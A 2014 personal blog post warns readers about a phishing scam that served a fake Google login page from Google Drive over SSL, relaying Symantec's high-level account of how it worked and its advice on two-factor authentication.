Thursday, 26 June 2014

Google Drive used to compromise user accounts

I received an email yesterday that was a very clever piece of illegal scamming 
When I looked further into how the scam works I got a surprise. Google Docs and Google Drive are the focus of a very sophisticated phishing scam that. This scam is more effective than the usual phishing messages we see every day because the Google Drive phishing page is actually served over SSL from the legitimate Google Drive service itself.

Most phishing mitigation focuses on visually inspecting the URL to make sure the connection is secure. And this is good advice, but this does not help prevent against this specific attack.

This phishing scam starts like many other phishing scams: with an email. The malicious message reportedly arrives with the subject line "Documents" and points to a Google Docs link. Again, it shows up in the address bar as a domain and takes you to a fake log-in page that looks just like the real Google login page. This is how the hackers get you.

"The fake page is actually hosted on Google's servers and is served over SSL, making the page even more convincing," Symantec security expert Nick Johnston explained in a blog post"The scammers have simply created a folder inside a Google Drive account, marked it as public, uploaded a file there, and then used Google Drive's preview feature to get a publicly accessible URL to include in their messages."
Page where the Phishing email leads

The email I received came from a legitimate customer who uses Google drive. When i clicked on the link I was brought to the page above. Once you log in through the fake page, you'll even be taken to an actual Google Doc. Your credentials will be sent to PHP script on a compromised server. You may never even know they've been swiped. 

Not just phishing, but malware too

According to Symantec Static HTML pages on Google Drive are also being used to redirect to malware. In these cases, a very small HTML file (under 100 bytes) uses JavaScript to redirect victims to a shortened URL (using SSL, perhaps to give a false sense of security). The shortened URL finally redirects to a compromised Brazilian website hosting a Trojan.

Symantec have advised users to enable Google's two-factor authentication and to use up-to-date security software on endpoints and gateways.

Symantec say they have contacted Google to seek advice and were given the following response

"We've removed the fake pages and our abuse team is working to prevent this kind of spoofing from happening again. If you think you may have accidentally given out your account information, please reset your password."

That was last March, I got the rogue email yesterday